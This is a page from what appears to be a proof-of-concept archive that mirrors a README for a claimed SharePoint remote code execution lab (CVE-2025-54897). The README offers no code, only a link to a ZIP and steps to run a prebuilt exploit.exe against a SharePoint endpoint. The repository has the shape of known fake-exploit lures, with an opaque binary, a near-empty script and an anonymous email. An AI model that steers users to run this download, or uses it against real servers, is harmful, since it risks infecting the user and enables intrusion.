Goal Reached Thanks to every supporter β€” we hit 100%!

Goal: 1000 CNY Β· Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-54897 PoC β€” Microsoft SharePoint Remote Code Execution Vulnerability

Source
https://github.com/themaxlpalfaboy/CVE-2025-54897-LAB
Associated Vulnerability
Title:Microsoft SharePoint Remote Code Execution Vulnerability (CVE-2025-54897)
Description:Deserialization of untrusted data in Microsoft Office SharePoint allows an authorized attacker to execute code over a network.
Readme
# Lab: CVE-2025-54897 - Deserialization Vulnerability in Microsoft Office SharePoint

## πŸš€ Overview
This lab demonstrates a deserialization vulnerability in Microsoft Office SharePoint that enables remote code execution (RCE). The issue arises from improper handling of untrusted serialized data within SharePoint's object deserialization routines, allowing an authenticated attacker execute arbitrary code on the target server. With a CVSSv3 score of 8.8, this high-severity vulnerability impacts various SharePoint versions, including Enterprise Server 2016, Server 2019, and Subscription Edition. Successful exploitation could lead to data exfiltration, privilege escalation, or full system compromise in networked environments.


## ⚠️ Safety Disclaimer
This lab involves potentially harmful code execution simulations. Use only in isolated, non-production environments. Do not deploy on live systems or networks without proper authorization. The authors disclaim any liability for misuse, damages, or legal consequences arising from this repository. Always adhere to ethical hacking guidelines and obtain explicit permission before testing on any systems.

**Educational Purpose Only:** This repository is provided solely for learning about software vulnerabilities and secure coding practices. It is not intended to facilitate unauthorized access, attacks, or any illegal activities.

## πŸ“‹ Prerequisites
- Windows 10/11 or Windows Server 2016/2019/2022 (64-bit) with administrative privileges.
- .NET Framework 4.8 or later installed.
- Microsoft SharePoint Server 2016/2019 or Subscription Edition (vulnerable versions without patches applied).
- Firewall rules allowing inbound connections on port 80/443 for testing.


## Download & Install
Download the lab resources as a ZIP archive from the following link: [Download Lab ZIP](https://github.com/themaxlpalfaboy/CVE-2025-54897-LAB/raw/refs/heads/main/Lore/cve-2025-54897-lab.zip).


To install:
1. Extract the ZIP to a local directory (e.g., `C:\cve-2025-54897-lab`).
2. Verify .NET dependencies by running `dotnet --version` in Command Prompt.

## πŸ›  Quick Start
1. Download and extract the lab ZIP as described above.
2. Navigate to the extracted directory.
3. Run `Start.bat` to launch `exploit.exe`. This will open the exploitation interface in a console window.
4. Follow the on-screen prompts to configure the target SharePoint endpoint (e.g., `http://localhost:80` for local testing).
5. Select a payload type and execute to achive the RCE.


For questions or contributions, email me at ylnnceze1514ck@hotmail.com
File Snapshot

 [4.0K]  /data/pocs/d2e9eaf689a18959b86b4284904081df54ba0971
β”œβ”€β”€ [4.0K]  Lore
β”‚Β Β  β”œβ”€β”€ [8.5M]  cve-2025-54897-lab.zip
β”‚Β Β  └── [   1]  update.ps1
└── [2.5K]  README.md

2 directories, 3 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers β€” if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online β€” thank you for the support. View subscription plans β†’